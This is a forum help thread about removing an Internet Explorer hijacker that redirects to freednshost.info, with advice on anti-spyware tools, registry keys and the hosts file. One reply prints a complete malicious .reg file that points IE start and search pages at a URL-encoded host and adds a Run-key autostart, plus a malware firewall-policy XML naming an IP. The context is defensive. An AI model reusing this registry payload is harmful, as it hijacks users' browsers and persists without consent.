[Okta Webinar] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 4277
  • Last Modified:

Unknown virus or malicious file

       I have  a serious problem. I believe I've been infected by something  that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run unproperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage as soon as I close the program and open it again its back to freednshost.info. Also every time I click a link on any Internet webpage it will send me to that same page, freednshost.info and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolocited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
 

I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
 What do I do?
0
datinfo
Asked:
datinfo
1 Solution
 
sunray_2003Commented:

After installing them, First Update them and then run

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml 

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html 
0
 
sunray_2003Commented:
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove  freednshost.info .. before doing that backup your registry
0
 
datinfoAuthor Commented:
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
0
Threat Trends for MSPs to Watch

See the findings.
Despite its humble beginnings, phishing has come a long way since those first crudely constructed emails. Today, phishing sites can appear and disappear in the length of a coffee break, and it takes more than a little know-how to keep your clients secure.

 
sunray_2003Commented:
Also check the host file

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the below is present

localhost  127.0.0.1


0
 
sunray_2003Commented:
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Ofcourse i should be online. LOL !!
0
 
sunray_2003Commented:
Thanks for the super fast feedback
0
 
knuthfCommented:
Whoops,
You forgot the most important key of the all: The "RUN" keys.
(RUN/RUNONCE). - In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
If this has a value e.g.
            sys    REG_SZ  "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated- same with e.g. WINNT\system32. The last files updated should only be the Perfomance log files.

Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as a IE "Cookie" in the temporary Internet files - and then after a while it is move. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
      <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
      <lockupinfo server="208.185.174.60" port="0" enable="true"/>
      <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
                  <processes>
            <process name="fssm32.exe" openprocessaction="allow">
                  <md5table>
                        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
                        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
                        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
                  </md5table>
            </process>
      </processes>
</securitypolicy>
...
- but where the ip address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid change of the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that virus spread with mail attachment.

I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.

Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users to change searchpage, homepage and security settings.
0
 
knuthfCommented:
I know I posted a virus.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
0
 
knuthfCommented:
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
0
 
mormanbCommented:
i am not able to delete the vsconfig.xml . It says process is being used by another process.   I restored my registry, how can i get rid of this vsconfig.xml ?
0
 
knuthfCommented:
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.

Delete *.vir next time you have rebooted the system.

This also allows you to rename files that you do not trust - and inhibit these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
0
 
knuthfCommented:
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
0

Featured Post

A Cyber Security RX to Protect Your Organization

Join us on December 13th for a webinar to learn how medical providers can defend against malware with a cyber security "Rx" that supports a healthy technology adoption plan for every healthcare organization.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now